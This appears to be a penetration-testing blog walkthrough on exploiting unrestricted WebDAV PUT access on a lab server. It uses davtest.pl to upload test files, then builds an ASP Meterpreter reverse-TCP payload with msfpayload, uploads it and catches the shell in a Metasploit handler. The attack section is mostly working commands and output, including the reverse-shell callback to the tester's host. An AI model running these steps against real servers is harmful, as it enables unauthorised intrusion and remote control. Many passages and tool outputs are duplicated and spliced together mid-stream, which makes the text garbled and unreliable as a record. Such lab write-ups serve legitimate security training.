Unrestricted WebDAV PUT/DELETE Access
Severity: High - 8
CVSS Score: 9.4
PCI Score: 5
CVSS Score: 9.4
PCI Score: 5
Description:
Unrestricted WebDAV requests expose a server to defacements and denial of service attacks. If the PUT method can be used by any unauthenticated remote user, arbitrary web pages can be inserted into the web root, or the disk can be filled with meaningless data; if the DELETE method is unprotected, then any file in a DAV-enabled directory can be removed at will.
Running nexpose scan against a vulnerable target will give a result observation similar as below:
/r7.txt was successfully PUT on the server, then removed with DELETE.
We can use davtest.pl - http://code.google.com/p/davtest/ - to validate whether WebDAV setup on target host is exploitable and if yes, to what extent.
lab@localhost:~/davtest-1.0$ ./davtest.pl
ERROR: Missing -url
./davtest.pl -url <url> [options]
-auth+ Authorization (user:password)
-cleanup delete everything uploaded when done
-directory+ postfix portion of directory to create
-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT text files then MOVE to executable
-nocreate don't create a directory
-quiet only print out summary
-rand+ use this instead of a random string for filenames
-sendbd+ send backdoors:
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ upload this file (requires -uploadloc)
-uploadloc+ upload file to this location/name (requires -uploadfile)
-url+ url of DAV location
Example: ./davtest.pl -url http://localhost/davdir
ERROR: Missing -url
./davtest.pl -url <url> [options]
-auth+ Authorization (user:password)
-cleanup delete everything uploaded when done
-directory+ postfix portion of directory to create
-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT text files then MOVE to executable
-nocreate don't create a directory
-quiet only print out summary
-rand+ use this instead of a random string for filenames
-sendbd+ send backdoors:
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ upload this file (requires -uploadloc)
-uploadloc+ upload file to this location/name (requires -uploadfile)
-url+ url of DAV location
Example: ./davtest.pl -url http://localhost/davdir
Test run against lab box:
lab@localhost:davtest-1.0# ./davtest.pl -url http://192.168.1.4 -directory demo_dir -rand rAnD0M5Tr1nG_upfileP0C -cleanup
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.1.4
********************************************************
NOTE Random string for this session: rAnD0M5Tr1nG_upfileP0C
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.1.4/demo_dir
********************************************************
Sending test files
PUT php SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT asp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT shtml FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT aspx FAIL
PUT cfm SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT jsp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT pl FAIL
PUT jhtml SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
********************************************************
Checking for test file execution
EXEC php FAIL
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.1.4
********************************************************
NOTE Random string for this session: rAnD0M5Tr1nG_upfileP0C
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.1.4/demo_dir
********************************************************
Sending test files
PUT php SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT asp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT shtml FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT aspx FAIL
PUT cfm SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT jsp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT pl FAIL
PUT jhtml SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC asp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
EXEC html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
EXEC txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
********************************************************
Cleaning up
DELETE SUCCEED: http://192.168.1.4/demo_dir
********************************************************
./davtest.pl Summary:
Created: http://192.168.1.4/demo_dir
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
EXEC html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
EXEC txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
********************************************************
Cleaning up
DELETE SUCCEED: http://192.168.1.4/demo_dir
********************************************************
./davtest.pl Summary:
Created: http://192.168.1.4/demo_dir
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
DELETED: http://192.168.1.4/demo_dir
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
DELETED: http://192.168.1.4/demo_dir
davtest.pl confirms whether we can PUT arbitrary files on the web server, and which files (filetypes) we can execute. As shown above, we see we can upload php, asp, html, txt, cfm, jsp and jhtml file types. However, out of these, we can only execute, asp, html and txt files.
This davtest summary can be a sufficient evidence for the vulnerability. In a pentest, however, there may be a scenario you face where the target host is all locked up and just a web server is running on 80/tcp. Then, exploiting this vulnerability becomes significant and we will need to go beyond just this davtest summary.
So what can we do from here? The obvious task is to upload a control mechanism on the target server. That is, we upload a web shell for example an asp shell via PUT, and then simply call it and play with the server.
You can find a lot of web shells with some google-fu, or you can write one yourself. Or we can generate a shell payload using msfpayload.
This davtest summary can be a sufficient evidence for the vulnerability. In a pentest, however, there may be a scenario you face where the target host is all locked up and just a web server is running on 80/tcp. Then, exploiting this vulnerability becomes significant and we will need to go beyond just this davtest summary.
So what can we do from here? The obvious task is to upload a control mechanism on the target server. That is, we upload a web shell for example an asp shell via PUT, and then simply call it and play with the server.
You can find a lot of web shells with some google-fu, or you can write one yourself. Or we can generate a shell payload using msfpayload.
lab@localhost:davtest-1.0#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -t asp -o aspmetrev443t.asp
Then, use davtest.pl to upload it.
lab@localhost:davtest-1.0# ./davtest.pl -url http://192.168.1.4 -directory demo_dir -uploadfile aspmetrev443t.asp -uploadloc demo_dir
Upload succeeded: http://192.168.1.4/demo_dir/aspmetrev443t.asp
Before you access this url, make sure you start metasploit multi handler to listen for incoming connection from this meterpreter reverse shell payload.
msf-pro >
msf-pro > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.1:443
[*] Starting the payload handler...
With everything set up now, browse to your shell aspmetrev443t.asp.
[*] Started reverse handler on 192.168.1.1:443
[*] Starting the payload handler...
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.1:443
[*] Starting the payload handler...
With everything set up now, browse to your shell aspmetrev443t.asp.
[*] Started reverse handler on 192.168.1.1:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.4:443 -> 192.168.1.1:56031)
+++++
Win!
No comments:
Post a Comment